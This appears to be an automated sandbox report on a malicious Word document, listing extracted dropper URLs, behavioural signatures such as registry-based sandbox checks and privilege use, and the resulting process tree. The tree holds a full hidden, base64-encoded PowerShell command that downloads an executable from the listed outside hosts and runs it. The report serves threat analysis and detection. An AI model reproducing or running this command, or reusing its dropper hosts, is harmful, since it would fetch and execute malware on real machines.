Analysis
-
max time kernel
25s -
resource
win10v191014 -
submitted
11-12-2019 00:38
General
-
Target
707d4fd996f5ae4f71dc6830eab9c61a469cc3e2f903cc4b23f31c7d37956bc2.doc
-
Sample
191211-38qbpa6yse
-
SHA256
707d4fd996f5ae4f71dc6830eab9c61a469cc3e2f903cc4b23f31c7d37956bc2
Score
8/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://wayby.com/abialek/cS2gKrl/
exe.dropper
http://www.zyx828.com/wp-admin/ysmi97y/
exe.dropper
http://www.uniwinchemical.com/calendar/uplsb/
exe.dropper
https://giasutothanoi.com/dup-installer/aij/
exe.dropper
http://www.windo360.com/qkoh/2bbq5m4/
Signatures
-
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4812 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
SppExtComObj.exePowershell.exedescription pid process target process PID 1620 wrote to memory of 1616 1620 SppExtComObj.exe SLUI.exe PID 4400 wrote to memory of 3016 4400 Powershell.exe 196.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4400 Powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
196.exepid process 3016 196.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXE196.exepid process 4812 WINWORD.EXE 3016 196.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4812 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4400 Powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\707d4fd996f5ae4f71dc6830eab9c61a469cc3e2f903cc4b23f31c7d37956bc2.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4812
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:1616
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABVAHIAdABvAG8AdwBnAGsAeQBzAGsAawBuAD0AJwBFAHAAZgBpAHMAbQBoAHgAZwBvAGkAJwA7ACQARgBmAHUAbABtAGMAdAB0AGsAZgB5ACAAPQAgACcAMQA5ADYAJwA7ACQATABuAHUAcgBuAHAAaQB1AHEAegB2AHQAPQAnAE4AagBhAHkAeABkAHAAdgBhACcAOwAkAEwAdwBzAHQAdABtAGoAegBuAGUAbwBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABGAGYAdQBsAG0AYwB0AHQAawBmAHkAKwAnAC4AZQB4AGUAJwA7ACQATABtAHQAbQB6AGcAcgBlAHMAbQA9ACcAVABhAHAAaABrAHkAZwBuAHoAaQBhACcAOwAkAEIAcQB5AHAAbQBxAGkAbABlAHoAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQBUAC4AdwBFAGIAYwBsAEkAZQBuAHQAOwAkAFoAaAB1AHUAbgBrAGQAYgB2AHYAbABkAD0AJwBoAHQAdABwADoALwAvAHcAYQB5AGIAeQAuAGMAbwBtAC8AYQBiAGkAYQBsAGUAawAvAGMAUwAyAGcASwByAGwALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB6AHkAeAA4ADIAOAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AeQBzAG0AaQA5ADcAeQAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHUAbgBpAHcAaQBuAGMAaABlAG0AaQBjAGEAbAAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8AdQBwAGwAcwBiAC8AKgBoAHQAdABwAHMAOgAvAC8AZwBpAGEAcwB1AHQAbwB0AGgAYQBuAG8AaQAuAGMAbwBtAC8AZAB1AHAALQBpAG4AcwB0AGEAbABsAGUAcgAvAGEAaQBqAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AdwBpAG4AZABvADMANgAwAC4AYwBvAG0ALwBxAGsAbwBoAC8AMgBiAGIAcQA1AG0ANAAvACcALgAiAHMAcABsAGAASQBUACIAKAAnACoAJwApADsAJABOAGsAaAB4AGMAcQBtAGYAZwBiAGMAbwBoAD0AJwBFAHAAbAB1AGgAdABnAHkAaAB3AGUAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQATwBwAHMAdAB0AGEAcgBhAG4AZABhAHoAdgAgAGkAbgAgACQAWgBoAHUAdQBuAGsAZABiAHYAdgBsAGQAKQB7AHQAcgB5AHsAJABCAHEAeQBwAG0AcQBpAGwAZQB6AC4AIgBkAE8AYABXAGAATgBsAG8AQQBEAGYASQBMAGUAIgAoACQATwBwAHMAdAB0AGEAcgBhAG4AZABhAHoAdgAsACAAJABMAHcAcwB0AHQAbQBqAHoAbgBlAG8AcwApADsAJABMAGMAbQBpAHAAbAB2AGoAPQAnAFcAcwBrAG0AeQBtAHMAYwBpAG4AaQAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEwAdwBzAHQAdABtAGoAegBuAGUAbwBzACkALgAiAEwAZQBgAE4AYABnAFQAaAAiACAALQBnAGUAIAAyADcANgA2ADUAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQByAHQAIgAoACQATAB3AHMAdAB0AG0AagB6AG4AZQBvAHMAKQA7ACQAQwBkAGgAbAB6AGIAeAB0AHMAPQAnAFkAcABnAHMAZQB4AHUAaQB2AHkAbwBqAHQAJwA7AGIAcgBlAGEAawA7ACQARABjAG8AaAB0AGIAZgBoAGYAbQBlAGsAPQAnAFIAYwBhAGgAcgBhAHgAbQBqACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AYgBiAGcAbwB0AG8AbQBlAHgAdgA9ACcASgB1AHQAaQBhAGcAYQBtAGsAZAAnAA==1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4400 -
C:\Users\Admin\196.exe"C:\Users\Admin\196.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3016